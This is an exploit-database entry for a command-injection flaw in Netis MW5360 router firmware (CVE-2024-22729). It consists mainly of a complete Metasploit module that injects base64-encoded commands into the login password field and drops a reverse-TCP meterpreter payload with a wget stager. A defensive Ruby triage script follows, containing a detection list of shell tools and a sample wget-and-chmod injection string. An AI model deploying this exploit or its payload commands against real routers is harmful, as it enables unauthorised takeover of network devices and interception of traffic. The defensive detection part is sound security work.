The Exploit Database - CXSecurity.com, 5 July 2024
Netis MW5360 Remote Command Execution
The Netis MW5360 router has a command injection vulnerability in the "password" parameter of its login page. The flaw stems from the router web interface's improper handling of the "password" parameter. An attacker can exploit it by injecting commands into the base64-encoded "password" parameter. Successful exploitation results in unauthorized command execution, potentially allowing the attacker to take control of the router.

🤔 The vulnerability lies in the login page of the Netis MW5360 router; an attacker can exploit it by injecting a base64-encoded command into the "password" parameter.

🚀 Exploitation consists of sending a POST request to the router's login page that carries a base64-encoded malicious command, which the router then executes.

🛡️ The vulnerability affects all Netis MW5360 routers running firmware version V1.0.1.3442 or lower.

⚠️ Successful exploitation could give an attacker full control of the router, including access to sensitive data, modification of the configuration, and even control over network traffic.

🆘 Users should update the router firmware to the latest version as soon as possible to fix the vulnerability, and take additional security measures such as changing the default password and enabling two-factor authentication.

##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

class MetasploitModule < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::CmdStager
  include Msf::Exploit::FileDropper
  prepend Msf::Exploit::Remote::AutoCheck

  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'Netis router MW5360 unauthenticated RCE.',
        'Description' => %q{
          Netis router MW5360 has a command injection vulnerability via the password parameter on the login page.
          The vulnerability stems from improper handling of the "password" parameter within the router's web interface.
          The router's login page authorization can be bypassed by simply deleting the authorization header,
          leading to the vulnerability. All router firmware versions up to V1.0.1.3442 are vulnerable.
          Attackers can inject a command in the 'password' parameter, encoded in base64, to exploit the command injection
          vulnerability. When exploited, this can lead to unauthorized command execution, potentially allowing the attacker
          to take control of the router.
        },
        'License' => MSF_LICENSE,
        'Author' => [
          'h00die-gr3y <h00die.gr3y[at]gmail.com>', # MSF module contributor
          'Adhikara13' # Discovery of the vulnerability
        ],
        'References' => [
          ['CVE', '2024-22729'],
          ['URL', 'https://attackerkb.com/topics/MvCphsf4LN/cve-2024-22729'],
          ['URL', 'https://github.com/adhikara13/CVE/blob/main/netis_MW5360/blind%20command%20injection%20in%20password%20parameter%20in%20initial%20settings.md']
        ],
        'DisclosureDate' => '2024-01-11',
        'Platform' => ['linux'],
        'Arch' => [ARCH_MIPSLE],
        'Privileged' => true,
        'Targets' => [
          [
            'Linux Dropper',
            {
              'Platform' => ['linux'],
              'Arch' => [ARCH_MIPSLE],
              'Type' => :linux_dropper,
              'CmdStagerFlavor' => ['wget'],
              'DefaultOptions' => {
                'PAYLOAD' => 'linux/mipsle/meterpreter_reverse_tcp'
              }
            }
          ]
        ],
        'DefaultTarget' => 0,
        'DefaultOptions' => {
          'SSL' => false,
          'RPORT' => 80
        },
        'Notes' => {
          'Stability' => [CRASH_SAFE],
          'Reliability' => [REPEATABLE_SESSION],
          'SideEffects' => [IOC_IN_LOGS, ARTIFACTS_ON_DISK]
        }
      )
    )
    register_options(
      [
        OptString.new('TARGETURI', [ true, 'The Netis MW5360 router endpoint URL', '/' ]),
        OptInt.new('CMD_DELAY', [true, 'Delay in seconds between payload commands to avoid locking', 30])
      ]
    )
  end

  def execute_command(cmd, _opts = {})
    # cleanup payload file when session is established.
    if cmd.include?('chmod +x')
      register_files_for_cleanup(cmd.split('+x')[1].strip)
    end
    # skip last command to remove payload because it does not work
    unless cmd.include?('rm -f')
      payload = Base64.strict_encode64("#{cmd}")
      print_status("Executing #{cmd}")
      send_request_cgi({
        'method' => 'POST',
        'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_set.cgi'),
        'vars_post' => {
          'password' => payload,
          'quick_set' => 'ap',
          'app' => 'wan_set_shortcut'
        }
      })
    end
  end

  def check
    print_status("Checking if #{peer} can be exploited.")
    res = send_request_cgi({
      'method' => 'POST',
      'uri' => normalize_uri(target_uri.path, '/cgi-bin/skk_get.cgi'),
      'vars_post' => {
        'mode_name' => 'skk_get',
        'wl_link' => 0
      }
    })
    return CheckCode::Unknown('No valid response received from target.') unless res && res.code == 200 && res.body.include?('version')

    # trying to get the model and version number
    # unfortunately JSON parsing fails, so we need to use this ugly REGEX :-(
    version = res.body.match(/.?(version).?\s:\s.?((\|[^,])*)/)
    # when found, remove whitespaces and make all uppercase to avoid surprises in string splitting and comparison
    unless version.nil?
      version_number = version[2].upcase.split('-V')[1].gsub(/[[:space:]]/, '').chop
      # The model number part is usually something like Netis(NC63), but occasionally you see things like Stonet-N3D
      if version[2].upcase.split('-V')[0].include?('-')
        model_number = version[2].upcase.split('-V')[0][/-([^-]+)/, 1].gsub(/[[:space:]]/, '')
      else
        # capture the text between the parentheses, e.g. NC63 from Netis(NC63)
        model_number = version[2].upcase.split('-V')[0][/\(([^)]+)/, 1].gsub(/[[:space:]]/, '')
      end
      # Check if target is model MW5360 and running firmware 1.0.1.3442 (newest release 2024-04-24) or lower
      if version_number && model_number == 'MW5360' && (Rex::Version.new(version_number) <= Rex::Version.new('1.0.1.3442'))
        return CheckCode::Appears(version[2].chop.to_s)
      end
      return CheckCode::Safe(version[2].chop.to_s)
    end
    CheckCode::Safe
  end

  def exploit
    print_status("Executing #{target.name} for #{datastore['PAYLOAD']}")
    case target['Type']
    when :linux_dropper
      # Don't check the response here since the server won't respond
      # if the payload is successfully executed
      execute_cmdstager(noconcat: true, delay: datastore['CMD_DELAY'])
    end
  end
end
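Defender-side triage helpers for this issue, added here as an example and not part of the Metasploit module or the Netis firmware: one decodes the base64 "password" field of POSTs to the skk_set.cgi endpoint the module targets and flags shell content, the other applies the module's model/version test to a firmware banner. The banner format, the shell-token list and all sample requests are assumptions constructed for illustration.

```ruby
require 'base64'
require 'cgi'

# Endpoint and POST field abused by the module, and the last affected firmware it checks for.
SKK_SET_PATH = '/cgi-bin/skk_set.cgi'.freeze
LAST_VULNERABLE = Gem::Version.new('1.0.1.3442')
# Shell metacharacters and stager verbs that a login password has no business containing (assumed list).
SUSPECT_RE = /[;&|`$<>]|\b(?:wget|curl|chmod|busybox|telnetd|nc)\b/i

# Returns the decoded command when a POST to skk_set.cgi carries a shell command
# in the base64 "password" field, or nil when the request looks benign.
def injected_command(path, body)
  return nil unless path == SKK_SET_PATH
  password = CGI.parse(body)['password'].first
  return nil if password.nil? || password.empty?
  decoded = Base64.strict_decode64(password).force_encoding('UTF-8').scrub
  decoded.match?(SUSPECT_RE) ? decoded : nil
rescue ArgumentError
  nil # not canonical base64, so not what the module's encoder produces
end

# Parses a banner such as "Netis(MW5360)-V1.0.1.3442" or "Stonet-N3D-V1.2" (format assumed
# from the module's comments) and reports whether it is an MW5360 on affected firmware.
def affected_firmware?(banner)
  m = banner.upcase.match(/(?:\(([^)]+)\)|-([^-()]+))-V(\d+(?:\.\d+)*)/)
  return false unless m
  (m[1] || m[2]) == 'MW5360' && Gem::Version.new(m[3]) <= LAST_VULNERABLE
end

# Returns [path, decoded_command] for every suspicious entry in a list of [path, urlencoded_body] pairs.
def triage(requests)
  requests.filter_map do |path, body|
    cmd = injected_command(path, body)
    [path, cmd] if cmd
  end
end

# Constructed sample traffic: a wget-stager style injection, an ordinary login, a version probe.
SAMPLE_REQUESTS = [
  [SKK_SET_PATH, "password=#{CGI.escape(Base64.strict_encode64('wget http://192.0.2.10/x -O /tmp/x; chmod +x /tmp/x'))}&quick_set=ap&app=wan_set_shortcut"],
  [SKK_SET_PATH, "password=#{CGI.escape(Base64.strict_encode64('S3cret-Passw0rd'))}&quick_set=ap&app=wan_set_shortcut"],
  ['/cgi-bin/skk_get.cgi', 'mode_name=skk_get&wl_link=0']
].freeze

if __FILE__ == $PROGRAM_NAME
  triage(SAMPLE_REQUESTS).each { |path, cmd| puts "#{path}: #{cmd.inspect}" }
  puts affected_firmware?('Netis(MW5360)-V1.0.1.3442')
end
```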
